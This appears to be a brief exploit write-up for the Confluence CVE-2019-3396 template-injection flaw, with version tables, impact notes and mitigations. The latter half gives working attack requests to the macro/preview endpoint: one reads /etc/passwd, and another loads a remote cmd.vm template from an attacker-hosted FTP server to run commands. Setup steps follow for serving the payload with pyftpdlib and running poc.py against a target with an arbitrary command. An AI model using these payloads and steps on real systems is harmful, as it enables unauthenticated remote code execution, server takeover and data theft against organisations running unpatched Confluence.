CVE-2019-3396 confluence SSTI RCE
- A critical Confluence bug (Atlassian).
- Type: Template Injection + Path Traversal.
- Risk: Remote Code Execution (RCE) without login.
- Status: Exploited in the wild.
- 6.6.0 → 6.6.11 ❌ vulnerable
- 6.6.12 ✅ fixed
- 6.12.0 → 6.12.2 ❌ vulnerable
- 6.12.3 ✅ fixed
- 6.13.0 → 6.13.2 ❌ vulnerable
- 6.13.3 ✅ fixed
- 6.14.0 → 6.14.1 ❌ vulnerable
- 6.14.2 ✅ fixed
👉 Always check Atlassian’s official advisory for full details.
- Full server takeover
- Data theft, ransomware, crypto-miners
- Attackers can run any code they want
- ✅ Upgrade to patched Confluence version (best fix)
- 🚫 Disable Widget Connector macro if you can’t patch right away
- 🔒 Limit access (internal only until fixed)
- Watch logs for strange requests hitting macro/preview endpoints
- Look for weird processes or outbound traffic
- Use vulnerability scanners to confirm version
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
- upload cmd.vm on your vps
- use ftp or https for create likn to this cmd.vm file via
pip install pyftpdlib
python -m pyftpdlib -p 8888
- update file poc.py with new value for pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"